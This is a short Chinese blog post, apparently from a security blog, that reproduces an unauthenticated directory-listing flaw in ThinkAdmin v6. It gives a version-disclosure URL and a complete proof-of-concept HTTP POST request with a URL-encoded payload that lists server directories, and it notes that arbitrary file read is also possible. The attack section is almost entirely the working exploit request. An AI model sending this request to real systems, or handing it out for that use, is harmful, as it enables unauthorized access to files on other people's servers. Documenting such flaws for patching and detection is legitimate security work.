Thinkadmin v6未授权列目录

漏洞简介

ThinkAdmin是基于 ThinkPHP 的微信后台管理平台

影响范围:

Thinkadmin版本小于 ≤ 2020.08.03.01

漏洞复现：

获取版本信息：

https://xxxxx/admin.html?s=admin/api.Update/version

POC

POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxxxxx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D

rules=%5B%22.%2F%22%5D为["./"]

也可实现任意文件读取，此文章暂无复现。

posted @ 2021-02-01 09:39 T0uch 阅读(137) 评论(0) 编辑收藏举报

刷新页面返回顶部

T0uch

Thinkadmin v6未授权列目录

公告